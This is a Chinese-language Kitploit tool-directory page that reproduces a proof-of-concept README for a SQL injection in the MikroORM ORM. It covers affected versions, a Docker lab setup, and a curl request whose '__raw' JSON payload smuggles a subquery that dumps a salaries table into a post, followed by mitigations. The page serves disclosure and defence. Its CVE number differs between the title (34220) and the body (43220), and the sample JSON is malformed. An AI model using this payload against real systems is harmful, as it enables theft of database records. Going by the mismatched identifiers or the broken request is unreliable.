Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-34220 — MikroORM 中的 SQL 注入漏洞 | Kitploit
工具/GitHubGitHub/eqstlab/cve-2026-34220
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育数据库安全
GitHubeqstlab/cve-2026-34220

CVE-2026-34220

MikroORM 中的 SQL 注入漏洞

查看仓库
191个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-43220 MikroORM SQL 注入

★ CVE-2026-43220 MikroORM SQL 注入 PoC ★

https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1


概述

CVE-2026-43220 是 MikroORM 中的一个 SQL 注入 漏洞,MikroORM 是一个广泛使用的 TypeScript/Node.js ORM 框架。
当包含 __raw 属性的用户提供值在未经校验的情况下被传入 自定义类型列 时,MikroORM 的 isRaw() 检查会将其识别为受信任的内部 Raw SQL 表达式,并将攻击者控制的 sql 值直接插入到生成的查询中,而不进行类型转换或清理,从而导致 任意 SQL 的非预期执行。


受影响版本

类别版本
受影响MikroORM 版本 ≤ 6.4.3 和 7.0.0 ≤ 版本 ≤ 7.0.5
已修复MikroORM 6.4.4 和 7.0.6

影响

  • 未经授权从数据库中窃取敏感数据
  • 破坏或非预期修改现有数据库记录

环境

root@kitploit:~
docker build -t cve-2026-43220-mikroorm-vuln .
docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln

PoC

启动受影响环境后,按照以下步骤复现攻击。

步骤 1. 发送包含 __raw 的恶意载荷请求

发送一个包含 __raw 属性、针对自定义类型列的 JSON 请求体。

root@kitploit:~
curl -X POST http://localhost:3000/write \
  -H "Content-Type: application/json" \
  -d '{
    "author":"x",
    "title":"x,
    "content": {
      "__raw": true,
      "sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)"
    }
  }'

步骤 2. 检查 HTTP 响应

确认 API 返回成功响应且没有任何错误, 这表明 MikroORM 已将恶意载荷作为有效值接受。

步骤 3. 确认敏感数据被窃取到帖子内容中

确认所创建帖子的 content 字段包含来自 salaries 表的查询结果 (例如 Alice: 5000 / Bob: 7000 / ...), 这证实来自无关表的数据已被静默嵌入 到响应中,且没有任何错误或访问控制违规。


缓解措施

  • 升级到 MikroORM 6.4.4 或更高版本,该版本在 isRaw() 中引入了来源验证,以拒绝外部提供的 __raw 属性
  • 应用 基于白名单的输入校验,在将值传递到 ORM 层之前拒绝诸如 __raw 之类的非预期属性

分析

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
  • EN: https://www.skshieldus.com/en/report?tab=eqst
下载工具